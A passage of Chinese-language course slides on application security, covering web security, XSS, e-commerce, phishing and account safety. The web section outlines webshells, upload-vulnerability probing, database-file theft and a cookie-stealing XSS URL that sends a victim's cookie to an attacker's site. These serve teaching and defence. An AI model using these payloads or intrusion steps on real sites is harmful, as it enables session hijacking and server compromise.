第7章應(yīng)用安全技術(shù)

第7章應(yīng)用安全技術(shù)主要內(nèi)容7.1Web應(yīng)用安全技術(shù)7.2電子商務(wù)安全7.3電子郵件加密技術(shù)7.4防垃圾郵件技術(shù)7.5網(wǎng)絡(luò)防釣魚技術(shù)7.6QQ安全使用7.7網(wǎng)上銀行賬戶安全7.8使用WinHex7.1Web應(yīng)用安全技術(shù)Web技術(shù)簡介與安全分析應(yīng)用安全基礎(chǔ)實(shí)例--xss跨站攻擊技術(shù)2023/2/13Web技術(shù)簡介與安全分析Web服務(wù)器也稱為WWW服務(wù)器，主要功能是提供網(wǎng)上信息瀏覽服務(wù)。UNIX/Linux系統(tǒng)中的Web服務(wù)器多采用Apache服務(wù)器軟件；Windows系統(tǒng)中的Web服務(wù)器多采用IIS服務(wù)器軟件。Web瀏覽器Web瀏覽器用于向服務(wù)器發(fā)送資源索取請求，并將接收到的信息進(jìn)行解碼和顯示。常見的Web瀏覽器軟件有Firefox、IE、Chrome等。通信協(xié)議Web瀏覽器與服務(wù)器之間遵循HTTP協(xié)議進(jìn)行通訊傳輸。2023/2/14HTML和JavaScript語言HTML是一種用來制作網(wǎng)頁的標(biāo)記語言，它不需要編譯，可以直接由瀏覽器執(zhí)行，屬于瀏覽器解釋型語言。JavaScript是一種基于對象和事件驅(qū)動并具有相對安全性的客戶端腳本語言。同時也是一種廣泛用于客戶端Web開發(fā)的腳本語言，常用來給HTML網(wǎng)頁添加動態(tài)功能，比如響應(yīng)用戶的各種操作。練習(xí)P268Web技術(shù)簡介與安全分析Web技術(shù)簡介與安全分析Webshell“web”的含義是顯然需要服務(wù)器開放web服務(wù)，“shell”的含義是取得對服務(wù)器某種程度上操作權(quán)限。webshell常常被稱為匿名用戶（入侵者）通過網(wǎng)站端口對網(wǎng)站服務(wù)器的某種程度上操作的權(quán)限。由于webshell其大多是以動態(tài)腳本的形式出現(xiàn)，也有人稱之為網(wǎng)站的后門工具。上傳漏洞在瀏覽器地址欄中網(wǎng)址的后面加上“/upfile.asp”（或與此含義相近的名字），如果顯示“上傳格式不正確”等類似的提示，說明存在上傳漏洞，可以用上傳工具得到WebShell。暴庫暴庫就是通過猜測數(shù)據(jù)庫文件所在的路徑來將其下載，得到該文件后就可以破解該網(wǎng)站的用戶密碼了。旁注利用同一主機(jī)上面不同網(wǎng)站的漏洞得到webshell，從而利用主機(jī)上的程序或者是服務(wù)所暴露的用戶所在的物理路徑進(jìn)行入侵。Web技術(shù)簡介與安全分析CGI通用網(wǎng)關(guān)接口，它是一段程序，運(yùn)行在服務(wù)器上，提供同客戶端HTML頁面的接口，通俗的講CGI就像是一座橋，把網(wǎng)頁和WEB服務(wù)器中的執(zhí)行程序連接起來，它把HTML接收的指令傳遞給服務(wù)器，再把服務(wù)器執(zhí)行的結(jié)果返還給HTML頁；用CGI可以實(shí)現(xiàn)處理表格，數(shù)據(jù)庫查詢，發(fā)送電子郵件等許多操作。CGI使網(wǎng)頁變得不是靜態(tài)的，而是交互式的。CGI可以用任何一種語言編寫，只要這種語言具有標(biāo)準(zhǔn)輸入、輸出和環(huán)境變量。

Web技術(shù)簡介與安全分析Web系統(tǒng)架構(gòu)用戶使用Web瀏覽器，通過網(wǎng)絡(luò)連接到Web服務(wù)器。用戶發(fā)出請求，服務(wù)器根據(jù)請求的URL，找到對應(yīng)的網(wǎng)頁文件，發(fā)送給用戶。網(wǎng)頁文件是HTML/XML格式的文本文件，Web瀏覽器有一個解釋器，將網(wǎng)頁文本轉(zhuǎn)換成Web瀏覽器中看到的網(wǎng)頁。

Web技術(shù)簡介與安全分析靜態(tài)網(wǎng)頁:網(wǎng)頁內(nèi)容不會發(fā)生變化，除非網(wǎng)頁設(shè)計(jì)者修改了網(wǎng)頁的內(nèi)容。不能實(shí)現(xiàn)和瀏覽網(wǎng)頁的用戶之間的交互。信息流向是單向的，即從服務(wù)器到瀏覽器。服務(wù)器不能根據(jù)用戶的選擇調(diào)整返回給用戶的內(nèi)容。Web技術(shù)簡介與安全分析動態(tài)網(wǎng)頁：能與后臺數(shù)據(jù)庫進(jìn)行交互，數(shù)據(jù)傳遞。也就是說，網(wǎng)頁URL的后綴不是.htm、.html、.shtml、.xml等靜態(tài)網(wǎng)頁的常見形動態(tài)網(wǎng)頁制作格式，而是以..asp、.jsp、.php、.perl、.cgi等形式為后綴，并且在動態(tài)網(wǎng)頁網(wǎng)址中有一個標(biāo)志性的符號——“?”。動態(tài)網(wǎng)頁一般以數(shù)據(jù)庫技術(shù)為基礎(chǔ)，可以大大降低網(wǎng)站維護(hù)的工作量采用動態(tài)網(wǎng)頁技術(shù)的網(wǎng)站可以實(shí)現(xiàn)更多的功能，如用戶注冊、用戶登錄、在線調(diào)查、用戶管理、訂單管理等等動態(tài)網(wǎng)頁實(shí)際上并不是獨(dú)立存在于服務(wù)器上的網(wǎng)頁文件，只有當(dāng)用戶請求時服務(wù)器才返回一個完整的網(wǎng)頁Web技術(shù)簡介與安全分析Web系統(tǒng)架構(gòu)安全分析服務(wù)器系統(tǒng)漏洞Web服務(wù)應(yīng)用漏洞密碼暴力破解Web技術(shù)簡介與安全分析應(yīng)用安全基礎(chǔ)網(wǎng)頁防篡改系統(tǒng)網(wǎng)頁內(nèi)容過濾技術(shù)實(shí)時信息過濾廣告軟件（adware）間諜軟件（spyware）瀏覽器劫持惡意共享軟件2023/2/113使用安全性比較高的瀏覽器,不要瀏覽不良網(wǎng)站,不要輕易安裝共享軟件、盜版軟件或免費(fèi)軟件。xss跨站攻擊技術(shù)XSS又稱CSS（CrossSiteScript），即跨站腳本攻擊，它指的是惡意攻擊者向Web頁面里插入惡意代碼，當(dāng)用戶瀏覽該頁時，嵌入Web里面的惡意代碼會被執(zhí)行，從而達(dá)到攻擊者的特殊目的。比如獲取用戶的Cookie，導(dǎo)航到惡意網(wǎng)站，攜帶木馬等。XSS屬于被動式的攻擊。2023/2/114用戶提交的變量沒有經(jīng)過完整過濾Html字符或者根本就沒有經(jīng)過過濾就放到了數(shù)據(jù)庫中，一個惡意用戶提交的Html代碼被其它瀏覽該網(wǎng)站的用戶訪問，通過這些Html代碼也就間接控制了瀏覽者的瀏覽器，就可以做很多的事情，如：竊取敏感信息、引導(dǎo)訪問者的瀏覽器去訪問惡意網(wǎng)站等。Xss跨站腳本攻擊原理一類是來自內(nèi)部的攻擊，主要指的是利用程序自身的漏洞，構(gòu)造跨站語句。另一類則是來自外部的攻擊，主要指的自己構(gòu)造XSS跨站漏洞網(wǎng)頁或者尋找非目標(biāo)機(jī)以外的有跨站漏洞的網(wǎng)頁。如當(dāng)我們要滲透一個站點(diǎn)，我們自己構(gòu)造一個有跨站漏洞的網(wǎng)頁，然后構(gòu)造跨站語句，通過結(jié)合其它技術(shù)，如社會工程學(xué)等，欺騙目標(biāo)服務(wù)器的管理員打開。XSS的種類XSS是如何發(fā)生的呢假如有下面一個textbox<inputtype="text"name="address1"value="value1from">value1from是來自用戶的輸入，如果用戶不是輸入value1from,而是輸入“><script>alert(document.cookie)</script><!-那么就會變成<inputtype="text"name="address1"value=""><script>alert(document.cookie)</script><!-">事件被觸發(fā)的時候嵌入的JavaScript代碼將會被執(zhí)行，

攻擊的威力，取決于用戶輸入了什么樣的腳本。XSS之所以會發(fā)生，是因?yàn)橛脩糨斎氲臄?shù)據(jù)變成了代碼。所以我們需要對用戶輸入的數(shù)據(jù)進(jìn)行HTMLEncode處理。將其中的"中括號"，“單引號”，“引號”之類的特殊字符進(jìn)行編碼。XSS攻擊舉例Tom發(fā)現(xiàn)了V中的一個頁面有XSS漏洞，例如:/search.asp?term=apple服務(wù)器中Search.asp頁面的代碼大概如下：

<html>

<title></title>

<body>

Resultsfor<%Request.QueryString("term")%>

...

</body>

</html>Tom先建立一個網(wǎng)站,

用來接收“偷”來的信息。

然后Tom構(gòu)造一個惡意的url(如下),通過某種方式(郵件，QQ)發(fā)給Monica /search.asp?term=<script>window.open("?cookie="+document.cookie)</script>Monica點(diǎn)擊了這個URL，嵌入在URL中的惡意Javascript代碼就會在Monica的瀏覽器中執(zhí)行.那么Monica在網(wǎng)站的cookie,就會被發(fā)送到badguy網(wǎng)站中。這樣Monica在

的信息就被Tom盜了XSS攻擊舉例7.2電子商務(wù)安全廣義的電子商務(wù)定義為，使用各種電子工具從事商務(wù)活動；狹義電子商務(wù)定義為，主要利用Internet從事商務(wù)或活動。電子商務(wù)涵蓋了兩個方面離不開互聯(lián)網(wǎng)這個平臺，沒有了網(wǎng)絡(luò)，就稱不上為電子商務(wù)通過互聯(lián)網(wǎng)完成的是一種商務(wù)活動

電子商務(wù)的安全控制要求安全交易標(biāo)準(zhǔn)目前安全電子交易的手段2023/2/1207.3電子郵件加密技術(shù)pgp2023/2/1217.4防垃圾郵件技術(shù)什么是垃圾郵件垃圾郵件的危害性避免垃圾郵件的幾種方法實(shí)例：垃圾郵件的處理2023/2/1227.5網(wǎng)絡(luò)防釣魚技術(shù)什么是網(wǎng)絡(luò)釣魚通過大量發(fā)送聲稱來自于銀行或其他知名機(jī)構(gòu)的欺騙性垃圾郵件，意圖引誘收信人給出敏感信息（如用戶名、口令、帳號ID、ATM或信用卡詳細(xì)信息）的一種攻擊方式。最典型的網(wǎng)絡(luò)釣魚攻擊將收信人引誘到一個通過精心設(shè)計(jì)與目標(biāo)組織的網(wǎng)站非常相似的釣魚網(wǎng)站上，并獲取收信人在此網(wǎng)站上輸入的個人敏感信息，通常這個攻擊過程不會讓受害者警覺。防備網(wǎng)絡(luò)釣魚的一般常識Windows用戶對網(wǎng)絡(luò)釣魚的防范Linux用戶對網(wǎng)絡(luò)釣魚的防范2023/2/1237.6qq安全使用密碼安全設(shè)置密碼保護(hù)2023/2/1247.7網(wǎng)上銀行賬戶安全什么是網(wǎng)上銀行網(wǎng)上銀行的發(fā)展網(wǎng)上銀行安全隱患和可